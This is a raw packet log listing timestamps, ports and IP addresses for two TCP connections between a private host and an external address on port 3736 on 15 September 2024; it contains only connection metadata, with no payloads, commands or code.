Sep 15, 2024 15:02:39.835011959 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835067034 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.835175991 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835186958 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835216999 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835235119 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.835256100 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.835290909 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835294008 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.835350990 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.835429907 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.835561991 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.840285063 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840411901 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840456009 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840465069 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840513945 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840523005 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840591908 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840600967 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840610027 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840647936 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840656996 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840673923 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840682983 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840759993 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840769053 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840785980 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.840832949 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.860440969 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.860500097 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.860511065 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.860586882 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.860635996 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.865890980 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.865901947 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.865911007 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.865925074 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866408110 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866417885 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866463900 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866487026 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866497040 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866571903 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.866995096 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.867003918 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.301387072 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.351222038 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.645185947 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.645309925 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.645428896 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.645535946 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.650104046 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650157928 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:40.650278091 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650324106 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650335073 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650345087 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650466919 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650476933 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650482893 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650543928 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650552988 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650597095 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650605917 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.650641918 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.655039072 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:40.978401899 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.023085117 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.551896095 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.551987886 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.552078962 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.552186966 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.552262068 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.552323103 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:41.630671024 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.630681992 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.630916119 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631256104 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631397009 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631438017 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631469965 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631519079 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631527901 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631541014 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631578922 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631622076 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631711006 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631733894 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631742001 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631769896 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631778955 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631788015 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.631798029 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.850979090 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:41.898103952 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:42.835799932 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:42.840543032 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:42.840639114 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:42.848665953 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:43.213006973 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:43.213054895 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:43.213092089 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:43.213161945 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:43.213196993 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:43.213387966 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:43.220911980 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:48.211024046 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:48.215958118 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:48.216093063 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:48.216156960 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:48.221234083 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:48.904556036 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:48.904591084 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:48.904850006 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:48.912951946 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:48.917706013 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.131944895 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.132245064 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:49.137129068 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.344996929 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.347806931 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:49.352720976 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.352797985 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:49.358134985 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.722347021 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.725127935 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:49.730602026 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:49.730693102 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:49.735842943 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.098115921 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113125086 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113192081 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113238096 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113260984 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113262892 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.113313913 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.113362074 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113428116 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113470078 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.113564968 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113574982 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.113625050 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.121746063 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.121777058 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.121788979 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.121824980 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.121871948 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.129595041 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.129610062 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.129621029 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.130191088 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.139170885 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.139190912 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.139202118 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.139234066 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.139252901 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.146691084 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.146739006 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.146807909 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.199951887 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.199980021 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.200042963 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.234133959 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.234181881 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.234201908 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.234213114 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.234253883 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.234253883 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.238569975 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.238601923 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.238614082 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.238642931 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.246743917 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.246804953 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.246817112 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.246819973 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.246925116 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.255558968 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.255575895 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.255589008 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.255651951 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.264029980 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.264049053 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.264060974 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.264110088 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.264156103 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.271934986 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.271953106 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.271964073 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.272021055 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.280339003 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.280371904 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.280383110 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.280409098 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.280478001 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.289604902 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.289629936 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.289674997 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.289745092 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.298634052 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.298681974 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.298691988 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.298712015 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.298743963 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.298816919 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:50.320789099 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:50.321090937 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.396007061 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.400907040 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.401005983 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.405766010 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.777798891 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.778040886 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.778053999 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.778065920 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.778148890 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.778150082 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.785739899 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.785752058 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.785763025 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.785824060 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.785962105 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.786031008 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.791229963 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.791241884 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.791251898 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.791307926 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.796859980 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.796873093 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.796883106 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.796968937 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.796968937 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984344006 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984358072 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984369993 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984383106 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984401941 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984477043 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984488964 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984532118 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984532118 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984680891 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984692097 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984703064 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984751940 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984751940 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984783888 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984797001 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984807968 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984827042 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984838963 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984849930 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984853983 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984868050 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984879971 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984889030 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984899998 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984900951 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984900951 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984913111 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984922886 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984935045 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984947920 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984958887 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.984977961 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.984977961 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.985018969 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.986766100 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.986779928 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.986866951 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.988028049 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.988099098 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.989577055 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989588976 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989602089 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989614010 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989666939 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.989666939 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.989749908 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989789009 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989801884 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989860058 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989872932 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.989911079 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.989911079 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.990648985 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.990659952 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.990673065 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.990711927 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.990724087 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.990726948 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.990776062 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.990776062 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.991512060 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.991523027 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.991534948 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.991545916 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.991559982 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.991578102 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.991612911 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.992362022 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.992379904 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.992393017 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.992403984 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.992415905 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.992434978 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.992434978 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.992470980 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.993191957 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.994797945 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.994810104 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.994834900 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.994882107 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.994882107 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.994986057 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995049953 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995165110 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.995342970 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995418072 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995486021 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.995685101 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995790958 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.995913982 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.996017933 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.996046066 CEST	3736	49707	194.113.106.180	192.168.2.10
